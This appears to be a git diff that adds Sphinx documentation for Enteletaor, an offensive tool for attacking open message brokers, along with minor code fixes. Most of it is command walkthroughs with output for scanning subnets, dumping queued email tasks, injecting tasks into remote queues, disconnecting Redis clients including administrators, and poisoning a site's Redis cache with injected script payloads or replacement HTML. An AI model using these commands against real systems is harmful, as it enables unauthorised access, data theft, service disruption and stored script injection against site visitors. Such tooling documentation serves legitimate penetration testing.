[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: aletha@cordell.com
[ * ] -> P1: Best of Groupon: The Deals That Make Us Proud (Unlike Our Nephew, Steve) Happy Birthday Lindsay - Surprise Inside!
[ * ] -> P2: Berlin by Soviet and Polish troops and the refusal of Japan to surrender under its terms, the United States dropped atomic bombs on the Eastern Front, the Allied invasion of Poland by Germany and the Axis.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: amie@cordell.com
[ * ] -> P1: Read your review for John Mulaney You're missing out on points Not Cool, Guys DO NOT Commit These Instagram Atrocities
[ * ] -> P2: MolotovRibbentrop Pact of August 1939, Germany and subsequent declarations of war in Europe concluded with an invasion of Poland by Germany and the subsequent German unconditional surrender on 8 May 1945.
[ * ] -> P2: In June 1941, the European Axis powers and the coalition of the world.
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
Output file
___________
We can export results to CVS file using ``--output`` option. The reason to choose this format is because it permit real-time reading. In other words:
Imagine you want to put enteleteaor in streaming mode and, at the same time, put another process to read the information from export file, CSV allow this because each line is independent of others.
Enteleteaor store CVS as *append* mode, so it will not overwriting old file content:
.. code-block:: bash
# enteleteaor tasks raw-dump -t 10.10.0.10 --streaming --output dumped_server_file
And, in other console, we can write:
.. code-block:: bash
# tail -f dumped_server_file.csv
.. note::
If not extension provided, enteleteaor automatically add .csv
Inject new tasks
++++++++++++++++
Finally, enteleteaor permit us to inject new tasks to the broker flow. The injection only accept one parameter: ``-f`` (``--function-file``).
This parameter need a JSON file as input with the function parameters. Do you remember `Export template`_ option of the list-tasks sub-command?
One we have the JSON file, we can inject the new process:
.. code-block:: bash
# enteleteaor tasks inject -f my_template.json
[ * ] Starting Enteletaor execution
[ * ] - Building process...
[ * ] - Trying to connect with server...
[ * ] - Sending processes to '10.10.0.10'
[ * ] 1) tasks.send_mail
[ * ] Done!
Redis
-----
Redis is a power full and versatile server. It can act as:
- Key-value database
- Broker
- Cache
- ...
So, it has it own command and actions:
Getting info
++++++++++++
This action was explained in :doc:`quickstart` document.
Listing connected users
+++++++++++++++++++++++
This action was explained in :doc:`quickstart` document.
Disconnecting users
+++++++++++++++++++
We not only can show all connected users, also can disconnect them. To do that we can use the sub-command ``disconnect``.
Disconnect one user
___________________
This command need as input the client to disconnect. Client must be as format: IP:PORT, as ``connected`` command displays.
.. code-block:: bash
:linenos:
:emphasize-lines: 7,13
# enteleteaor redis connected -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Connected users to '10.10.0.10':
[ * ] - 10.10.0.2:52748 (DB: 0)
[ * ] - 10.10.0.2:52749 (DB: 0)
[ * ] - 10.10.0.2:52752 (DB: 0)
[ * ] - 127.0.0.1:42262 (DB: 0)
[ * ] - 10.10.0.2:51200 (DB: 0)
[ * ] Done!
# enteleteaor redis disconnect -t 10.10.0.10 -c 127.0.0.1:42262
[ * ] Starting Enteletaor execution
[ * ] - Client '127.0.0.1:42264' was disconnected
[ * ] Done!
Disconnect all users
____________________
If you want to disconnect all connected users, enteleteaor has the shortcut ``--all``:
.. code-block:: bash
# enteleteaor redis disconnect -t 10.10.0.10 --all
Discovering DBs
+++++++++++++++
By default Redis has 16 databases, but you can add as many as you need. If the database used by the remote server is different to 0 (default database) and you need to discover them, you can use ``discover-dbs``:
.. code-block:: bash
# enteleteaor redis discover-dbs -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Discovered '10.10.0.10' DBs at '16':
[ * ] - DB0 - 4 keys
[ * ] - DB1 - Empty
[ * ] - DB2 - Empty
[ * ] - DB3 - Empty
[ * ] - DB4 - Empty
[ * ] - DB5 - Empty
[ * ] - DB6 - Empty
[ * ] - DB7 - Empty
[ * ] - DB8 - Empty
[ * ] - DB9 - Empty
[ * ] - DB10 - Empty
[ * ] - DB11 - Empty
[ * ] - DB12 - Empty
[ * ] - DB13 - Empty
[ * ] - DB14 - Empty
[ * ] Done!
Dumping information
+++++++++++++++++++
Basic usage
___________
One of more interesting thing is display information stored in redis and has the possibility to export it.
``dump`` sub-command permit that:
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] "b'unacked'":
[ * ] {
[ * ] "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'":
[ * ] {
[ * ] "content-encoding": "b'binary'"
[ * ] "properties":
[ * ] {
[ * ] "body_encoding": "b'base64'"
[ * ] "delivery_mode": "2"
[ * ] "delivery_info":
[ * ] {
[ * ] "priority": "0"
[ * ] "exchange": "b'celery'"
[ * ] "routing_key": "b'celery'"
[ * ] }
[ * ] "delivery_tag":
[ * ] {
[ * ] "delivery_tag": "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'"
[ * ] }
[ * ] "headers":
[ * ] {
[ * ] }
[ * ] "body":
[ * ] {
[ * ] "chord": "None"
[ * ] "retries": "0"
[ * ] "kwargs":
[ * ] {
[ * ] }
[ * ] "task": "b'tasks.send_mail'"
[ * ] "errbacks": "None"
[ * ] "taskset": "None"
[ * ] "timelimit": "(None, None)"
[ * ] "callbacks": "None"
[ * ] "eta": "None"
[ * ] "id":
[ * ] {
[ * ] "id": "b'8d772bd5-7f2c-4bef-bc74-aa582aaf0520'"
[ * ] "expires": "None"
[ * ] "utc": "True"
[ * ] "args": "('leatha@elidia.com', 'Guys DO NOT Commit These Instagram Atrocities 10 Engagement Tips to Gobble Over Thanksgiving Buffer has been hacked - here', 'Declaration by the Western Allies and the refusal of Japan to surrender under its terms, the United States emerged as an effort to end pre-war enmities and to create a common identity.')"
[ * ] }
[ * ] "content-type":
[ * ] {
[ * ] "content-type": "b'application/x-python-serialize'"
[ * ] }
[ * ] Done!
Exporting results
_________________
Don't worry if above console output is a bit heavy, we can export results to a JSON file using ``-e`` (``--export-results``):
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10 -e dumped_info
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Storing information into 'results.json'
[ * ] "b'unacked'":
[ * ] {
[ * ] "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'":
[ * ] {
[ * ] "content-encoding": "b'binary'"
[ * ] "properties":
[ * ] {
[ * ] "body_encoding": "b'base64'"
[ * ] "delivery_mode": "2"
[ * ] "delivery_info":
[ * ] {
[ * ] "priority": "0"
[ * ] "exchange": "b'celery'"
[ * ] "routing_key": "b'celery'"
[ * ] }
[ * ] "delivery_tag":
[ * ] {
[ * ] "delivery_tag": "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'"
[ * ] }
[ * ] "headers":
[ * ] {
[ * ] }
[ * ] "body":
[ * ] {
[ * ] "chord": "None"
[ * ] "retries": "0"
[ * ] "kwargs":
[ * ] {
[ * ] }
[ * ] "task": "b'tasks.send_mail'"
[ * ] "errbacks": "None"
[ * ] "taskset": "None"
[ * ] "timelimit": "(None, None)"
[ * ] "callbacks": "None"
[ * ] "eta": "None"
[ * ] "id":
[ * ] {
[ * ] "id": "b'8d772bd5-7f2c-4bef-bc74-aa582aaf0520'"
[ * ] "expires": "None"
[ * ] "utc": "True"
[ * ] "args": "('leatha@elidia.com', 'Guys DO NOT Commit These Instagram Atrocities 10 Engagement Tips to Gobble Over Thanksgiving Buffer has been hacked - here', 'Declaration by the Western Allies and the refusal of Japan to surrender under its terms, the United States emerged as an effort to end pre-war enmities and to create a common identity.')"
[ * ] }
[ * ] "content-type":
[ * ] {
[ * ] "content-type": "b'application/x-python-serialize'"
[ * ] }
[ * ] Done!
.. note::
We don't need to put the extension .json to file. If extension is missing, enteleteaor will add it.
Hide screen output
__________________
If you don't want to display information into screen (useful when Redis contains a lot of information) using ``--no-screen`` option:
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10 -e dumped_info --no-screen
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Storing information into 'results.json'
[ * ] Done!
Handling cache
++++++++++++++
Redis is commonly used as a centralized cache system. We can handle this cache stored in it.
Finding cache keys
__________________
First step is find possible cache keys in Redis. Enteleteaor has the option ``--search`` that will try to find this keys:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Looking for caches in '10.10.0.10'...
[ * ] - Possible cache found in key: b'flask_cache_view//'
[ * ] Done!
Dumping all cache keys
______________________
If we want to dump, as raw-way, possible cache keys (not only locate) we omit the option ``--search``:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Listing cache information:
[ * ] -> Key: 'b'flask_cache_view//'' -
[ * ] -> Content:
!X<!--
Author: WebThemez
Author URL: http://webthemez.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!doctype html>
<!--[if IE 7 ]> <html lang="en-gb" class="isie ie7 oldie no-js"> <![endif]-->
<!--[if IE 8 ]> <html lang="en-gb" class="isie ie8 oldie no-js"> <![endif]-->
<!--[if IE 9 ]> <html lang="en-gb" class="isie ie9 no-js"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="en-en" class="no-js">
<!--<![endif]-->
<head>
...
[ * ] Done!
Dumping specific cache key
__________________________
We can dump only an specific key:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10 --cache-key "flask_cache_view//"
[ * ] Starting Enteletaor execution
[ * ] - Listing cache information:
[ * ] -> Key: 'b'flask_cache_view//'' -
[ * ] -> Content:
!X<!--
Author: WebThemez
Author URL: http://webthemez.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!doctype html>
<!--[if IE 7 ]> <html lang="en-gb" class="isie ie7 oldie no-js"> <![endif]-->
<!--[if IE 8 ]> <html lang="en-gb" class="isie ie8 oldie no-js"> <![endif]-->
<!--[if IE 9 ]> <html lang="en-gb" class="isie ie9 no-js"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="en-en" class="no-js">
<!--<![endif]-->
<head>
...
[ * ] Done!
Basic cache poisoning
_____________________
Enteleteaor permit us to poison the cache. To enable the cache we need to enable it with option ``-P``.
By default, enteleteaor will try to inject an HTML <script> tag with an alert message:
.. code-block:: bash
# enteleteaor redis cache -P -t 10.10.0.1
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'flask_cache_view//' at server '10.10.0.10'
[ * ] Done!
Custom cache poisoning with
___________________________
We can replace the default behavior adding a custom script code:
**Inline**:
Using ``--payload`` option. This option need a file with the script:
.. code-block:: bash
# enteleteaor redis cache -P -t 10.10.0.10 --payload "<script>document.write('Say cheeeeers')</script>"
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'b'flask_cache_view//'' at server '10.10.0.10'
[ * ] Done!
**Using file**:
.. code-block:: bash
# echo "<script>document.write('Say cheeeeers')</script>" > my_payload.txt
# enteleteaor redis cache -P -t 10.10.0.10 --file-payload my_payload.txt
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'b'flask_cache_view//'' at server '10.10.0.10'
[ * ] Done!
Replace cache content
_____________________
Finally, we can replace entire content of cache key using option ``--replace-html``:
.. code-block:: bash
# echo "<html><head><title>Replaced content</title></head><body><h1>Say cheeeeers again :)</h1></body></html>" > new_html.html
# enteleteaor redis cache -P -t 10.10.0.10 --replace-html new_html.html
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'flask_cache_view//' at server '10.10.0.10'
[ * ] Done!

313
doc/source/conf.py Normal file
View File

@@ -0,0 +1,313 @@
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 11 01:21:33 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Enteletaor'
copyright = u', Daniel Garcia (cr0hn) - @ggdaniel'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'enteletaor'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
# The basename for the epub file. It defaults to the project name.
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True

60
doc/source/index.rst Normal file
View File

@@ -0,0 +1,60 @@
.. Documentation master file, created by
sphinx-quickstart on Wed Feb 11 01:21:33 2015.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Enteletaor documentation!
====================================
.. figure:: ../images/enteletaor-logo-150px.png
:align: left
Enteletaor is a message Queue & Broker Injection tool.
+----------------+------------------------------------+
|Project site | http://github.com/cr0hn/enteletaor |
+----------------+------------------------------------+
|Documentation | http://enteletaor.readthedocs.org |
+----------------+------------------------------------+
|Author | Daniel Garcia (cr0hn) - @ggdaniel |
+----------------+------------------------------------+
|Last Version | 1.0.0 |
+----------------+------------------------------------+
|Python versions | 2.7.x % 3.x |
+----------------+------------------------------------+
Quick project description
-------------------------
Enteleteaor is a tool that can handle information from open brokers.
Some of the actions you can do:
- Listing remote tasks.
- Read remote task content.
- Disconnect remote clients from Redis server (even the admin!)
- Inject tasks into remote processes.
- Make a scan to discover open brokers.
Currently supported brokers are:
- RabbitMQ (or AMQP compatible).
- ZeroMQ.
- Redis.
Content Index
-------------
.. toctree::
:maxdepth: 3
installation
quickstart
advanced
Licence
-------
I believe in freedom, so Enteletaor is released under BSD license.

View File

@@ -0,0 +1,94 @@
Installation
============
Dependencies
------------
First you be sure you have installed this packages:
Python 2 & 3
++++++++++++
.. code-block:: bash
# sudo apt-get install -y libzmq3 libzmq3-dev
Python 3 only (recommended)
+++++++++++++++++++++++++++
.. code-block:: bash
# sudo apt-get install -y python3-pip
Python 2 only
+++++++++++++
.. code-block:: bash
# sudo apt-get install -y python2.7-dev
Installation from PIP (recommended)
-----------------------------------
The easiest way to install enteleteaor is from Pypi. To do this, only run:
Python 2
++++++++
.. code-block:: bash
# python -m pip install enteletaor
Python 3
++++++++
.. code-block:: bash
# python3 -m pip install enteletaor
Then run enteleteaor writing:
.. code-block:: bash
# enteleteaor -h
or, in Python 3:
.. code-block:: bash
# enteleteaor3 -h
.. note::
Remember that, if you install enteleteaor in **Python 3** executable will be called **enteletaor3** -> ending in **3**.
If you install in **Python 2** executable will be **enteletaor**, without 3.
Installation from source
------------------------
Also, you can download source code from github using git:
.. code-block:: bash
git clone https://github.com/cr0hn/enteleteaor.git enteleteaor
Next you need to install dependencies from ``requirements.txt``:
.. code-block:: bash
pip install -r requirements.txt
.. note::
If you're not running enteleteaor in a virtualenv, probably you need to be root to install requirements. So, you can use ``sudo`` command.
Finally you can run enteleteaor:
.. code-block:: bash
# cd enteleteaor_lib
# python enteleteaor.py -h

201
doc/source/quickstart.rst Normal file
View File

@@ -0,0 +1,201 @@
Quick Start
===========
Enteleteaor have 3 super commands available:
- scan: scanner that discover open brokers.
- tasks: handle remote tasks.
- redis: specific actions for Redis server.
This document contains an overview of enteleteaor with some examples for each super commands. If you want learn more, visit the :doc:`attacks`.
Python versions
---------------
Enteleteaor can run in Python 2.7.x and 3.x. Python 3 is recommended, but you cand use python 2.7 without any problem.
Getting help
------------
Super commands ``tasks`` and ``redis`` has many sub-options, you can get help using ``-h`` in each super command:
.. code-block:: bash
:linenos:
:emphasize-lines: 9-14
# enteleteaor scan -h
usage: enteletaor.py redis [-h]
{info,disconnect,dump,cache,discover-dbs,connected}
...
positional arguments:
{info,disconnect,dump,cache,discover-dbs,connected}
redis commands:
info open a remote shell through the Redis server
disconnect disconnect one or all users from Redis server
dump dumps all keys in Redis database
cache poison remotes cache using Redis server
discover-dbs discover all Redis DBs at server
connected get connected users to Redis server
optional arguments:
-h, --help show this help message and exit
Setting verbosity level
-----------------------
Enteleteaor has 5 levels of verbosity, you can setup adding ``-v`` to command line:
.. code-block:: bash
# enteleteaor -v scan -t 10.10.0.10
# enteleteaor -vvvv scan -t 10.10.0.10
.. note::
Be careful to put ``-v`` between enteleteaor and top action:
- enteleteaor -vv scan ... -> **GOOD**
- enteleteaor scan -vv ... -> **BAD**
Quick scan
----------
Quickly you make try to discover if some host has open brokers running that:
.. code-block:: bash
# enteleteaor -v scan -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Number of targets to analyze: 1
[ * ] - Starting scan
[ * ] > Analyzing host '10.10.0.10'
[ * ] <!!> Open 'RabbitMQ' server found in port '5672' at '10.10.0.10'
[ * ] <!!> Open 'Redis' server found in port '6379' at '10.10.0.10'
[ * ] <!!> Open 'ZeroMQ' server found in port '5555' at '10.10.0.10'
[ * ] - Open services found:
[ * ] -> Host - 10.10.0.10
[ * ] * 6379/TCP [Redis]
[ * ] * 5672/TCP [RabbitMQ]
[ * ] * 5555/TCP [ZeroMQ]
[ * ] Done!
You can also analyze an entire network:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/24
Remote tasks
------------
Listing remote tasks
++++++++++++++++++++
With enteleteaor you can handle remote tasks, for example, you can list pending tasks making:
.. code-block:: bash
# enteleteaor -v tasks list-tasks -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Remote process found:
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] Done!
Enteleteaor is telling us that has discovered a task, called ``tasks.send_mail`` with 3 parameters, and what type has in each position.
The tool can't discover the parameter name, thus indicate the position. This tasks can match with this programing function, i.e:
.. code-block:: python
:linenos:
:emphasize-lines: 3,6,9
def send_mail(to, from, message):
"""
:param to: mail destination
:type to: str
:param from: mail sender
:type from: str
:param message: content of message
:type message: str
"""
# Code that send the e-mail
Dump tasks content
++++++++++++++++++
Enteleteaor not only permit us to list remote tasks, it also can dump the tasks content:
.. code-block:: bash
:linenos:
:emphasize-lines: 6-8,12-14,18-20
# enteleteaor tasks raw-dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: particia@stephnie.com
[ * ] -> P1: Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: Asia and the Pacific and was already at war with the invasion of the United States emerged as rival superpowers, setting the stage for the Cold War, which lasted for the next 46 years.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: eveline@stephnie.com
[ * ] -> P1: Can You Afford?
[ * ] -> P2: Berlin by Soviet and Polish troops and the coalition of the United Kingdom and the United States and European territories in the Pacific, the Axis lost the initiative and undertook strategic retreat on all fronts.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: milford@stephnie.com
[ * ] -> P1: Hey Don't Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: European neighbours, Poland, Finland, Romania and the Axis.
[ * ] No more messages from server. Exiting...
[ * ] Done!
Redis
-----
Redis is a powerful software, with many options, so it can a specific super command.
Getting remove Redis info
+++++++++++++++++++++++++
If you want to list remote Redis server information, only type:
.. code-block:: bash
# enteleteaor redis info -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Config for server '10.10.0.10':
[ * ] - appendonly: no
[ * ] - auto-aof-rewrite-min-size: 67108864
...
[ * ] - timeout: 0
[ * ] - databases: 16
[ * ] - slave-priority: 100
[ * ] - dir: /var/lib/redis
[ * ] Done!
Listing users
+++++++++++++
We can also list all connected users to Redis server. A user could be a web application (that uses Redis as cache), a monitoring system or, even, the administrator.
.. code-block:: bash
# enteleteaor redis connected -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Connected users to '10.10.0.10':
[ * ] - 10.10.0.2:52748 (DB: 0)
[ * ] - 10.10.0.2:52749 (DB: 0)
[ * ] - 10.10.0.2:52752 (DB: 0)
[ * ] - 127.0.0.1:42262 (DB: 0)
[ * ] - 10.10.0.2:53095 (DB: 0)
[ * ] Done!
Localhost addresses usually are local monitoring or admin.

View File

@@ -3,7 +3,7 @@
# --------------------------------------------------------------------------
# Run Boot loader
# --------------------------------------------------------------------------
if __package__ == "enteletaor_lib":
if __package__ == "enteletaor_lib" or __name__ == "enteletaor_lib":
from .libs.core.bootloader import boot_loader

View File

@@ -33,7 +33,7 @@ __banner__ = """
____ _ _ ___ ____ _ ____ ___ ____ ____ ____
|___ |\ | | |___ | |___ | |__| | | |__/
|___ | \| | |___ |___ |___ | | | |__| | \\
"""
""" # Font name: Cyberlarge
# --------------------------------------------------------------------------
# Generic global config

View File

@@ -29,7 +29,7 @@ def setup_cmd():
class STBArgumentParser(_argparse.ArgumentParser):
def parse_args_and_run_hooks(self, args=None, namespace=None):
parsed_args = super(STBArgumentParser, self).parse_args(args, namespace)
parsed_args = super(self.__class__, self).parse_args(args, namespace)
# Run hooks
self.run_hooks(parsed_args)

View File

@@ -1,18 +1,6 @@
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
def get_user_config_path():
"""
"""
# ----------------------------------------------------------------------
def get_project_config_path():
"""
"""
from __future__ import absolute_import
# ----------------------------------------------------------------------
@@ -24,7 +12,7 @@ def load_config():
try:
from config import __author__, __tool_name__, __site__, __version__
except ImportError:
__author__ = __name__ = __site__ = __version__ = "unknown"
__author__ = __tool_name__ = __site__ = __version__ = "unknown"
from .structs import AppSettings

View File

@@ -1,165 +0,0 @@
# -*- coding: utf-8 -*-
from schematics.exceptions import ConversionError, ValidationError
from schematics.models import Model as _Model
from schematics.types import BaseType as _BaseType, utf8_decode, unicode
from schematics.types import (StringType, IntType, FloatType, DateTimeType, IPv4Type,
URLType, EmailType, NumberType, LongType, DecimalType,
HashType, SHA1Type, BooleanType, DateType, UUIDType)
from schematics.types.compound import ListType
# region Monkey Patch
# --------------------------------------------------------------------------
# Monkey patch fo Schematics to add:
# - New property for types: "description"
# - Constructor of models without dicts, using instead **kwargs
# --------------------------------------------------------------------------
def __str__(self):
return self.description
# ----------------------------------------------------------------------
def new_init(self, required=False, default=None, serialized_name=None,
choices=None, validators=None, deserialize_from=None,
serialize_when_none=None, messages=None,
# Custom parameters
description="Field description", is_file_results=False):
# Call original constructor
_BaseType.old__init__(self, required, default, serialized_name, choices, validators, deserialize_from,
serialize_when_none, messages)
if not isinstance(description, str):
raise TypeError("Expected str, got '%s' instead" % type(description))
if not isinstance(is_file_results, bool):
raise TypeError("Expected bool, got '%s' instead" % type(is_file_results))
self.description = description
self.is_file_results = is_file_results
# Monkey patch!
_BaseType.old__init__ = _BaseType.__init__
_BaseType.__init__ = new_init
# _BaseType.__str__ = __str__
# endregion
# --------------------------------------------------------------------------
# New type
# --------------------------------------------------------------------------
class FileType(_BaseType):
allow_casts = (int, str)
MESSAGES = {
'convert' : u"Couldn't interpret '{0}' as string.",
'max_length': u"String value is too long.",
'min_length': u"String value is too short."
}
def __init__(self, name=None, file_type=None, path=None, max_length=None, min_length=None, **kwargs):
self.max_length = max_length
self.min_length = min_length
self.file_type = file_type
self.path = path
super(FileType, self).__init__(**kwargs)
def to_native(self, value, context=None):
if value is None:
return None
if not isinstance(value, unicode):
